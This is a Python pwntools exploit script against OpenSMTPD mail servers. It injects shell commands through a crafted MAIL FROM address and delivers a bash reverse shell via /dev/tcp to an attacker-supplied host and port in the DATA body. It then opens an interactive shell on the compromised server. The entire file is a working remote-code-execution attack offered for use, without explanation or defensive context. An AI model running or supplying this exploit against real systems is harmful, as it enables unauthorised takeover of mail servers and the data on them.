#!/usr/bin/python3

from pwn import *
import sys

try:
    target_host = sys.argv[1]
    target_port = int(sys.argv[2])
    rev_host    = sys.argv[3]
    rev_port    = int(sys.argv[4])
    email       = sys.argv[5]
except:
    log.failure("Usage: python3 exploit.py <target_host> <target_port> <reverse_host> <reverse_port> <recipient_email>")
    exit()

r = remote(target_host, target_port)
banner = r.recvline().decode()
if "OpenSMTPD" in banner:
    log.success("Target port is running OpenSMTPD")
    p = log.progress(f"Sending love letter to {email}")
    r.sendline("HELO lol.com")
    res = r.recvline().decode()
    p.status(res)
    r.sendline("MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>")
    res = r.recvline().decode()
    p.status(res)
    if "250" not in res:
        log.failure("Target not vulnerable!")
        r.close()
        exit()
    r.sendline(f"RCPT TO:<{email}>")
    res = r.recvline().decode()
    p.status(res)
    if "250" not in res:
        log.failure("Recipient email address is invalid!")
        r.close()
        exit()
    r.sendline("DATA")
    res = r.recvline().decode()
    p.status(res)
    payload = f"""
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
bash -c 'bash -i >& /dev/tcp/{rev_host}/{rev_port} 0>&1'
.
"""
    r.send(payload)
    p.success("Done")
    r.close()
    l = listen(rev_port, bindaddr = rev_host)
    l.wait_for_connection()
    l.interactive()

else:
    log.failure("Target port is not running OpenSMTPD!")
    r.close()